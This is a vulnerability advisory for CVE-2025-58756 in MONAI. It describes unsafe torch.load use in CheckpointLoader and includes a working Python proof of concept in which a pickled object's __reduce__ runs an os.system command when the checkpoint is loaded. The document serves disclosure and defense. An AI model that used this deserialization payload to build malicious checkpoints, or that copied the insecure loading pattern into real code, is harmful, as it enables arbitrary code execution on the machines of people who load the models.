CVE-2025-58756: MONAI: Unsafe torch usage may lead to arbitrary code execution

In model_dict = torch.load(full_path, map_location=torch.device(device), weights_only=True) in monai/bundle/scripts.py , weights_only=True is loaded securely. However, insecure loading methods still exist elsewhere in the project, such as when loading checkpoints.

This is a common practice when users want to reduce training time and costs by loading pre-trained models downloaded from platforms like huggingface.

Loading a checkpoint containing malicious content can trigger a deserialization vulnerability, leading to code execution.

The following proof-of-concept demonstrates the issues that arise when loading insecure checkpoints.

import os
import tempfile
import json
import torch
from pathlib import Path

class MaliciousPayload:
def __reduce__(self):
return (os.system, ('touch /tmp/hacker2.txt',))

def test_checkpoint_loader_attack():



temp_dir = Path(tempfile.mkdtemp())
checkpoint_file = temp_dir / "malicious_checkpoint.pt"


malicious_checkpoint = {
'model_state_dict': MaliciousPayload(),
'optimizer_state_dict': {},
'epoch': 100
}


torch.save(malicious_checkpoint, checkpoint_file)


from monai.handlers import CheckpointLoader
import torch.nn as nn


model = nn.Linear(10, 1)

loader = CheckpointLoader(
load_path=str(checkpoint_file),
load_dict={"model": model}
)

class MockEngine:
def __init__(self):
self.state = type('State', (), {})()
self.state.max_epochs = None
self.state.epoch = 0

engine = MockEngine()
loader(engine)


proof_file = "/tmp/hacker2.txt"
if os.path.exists(proof_file):
print("Succes")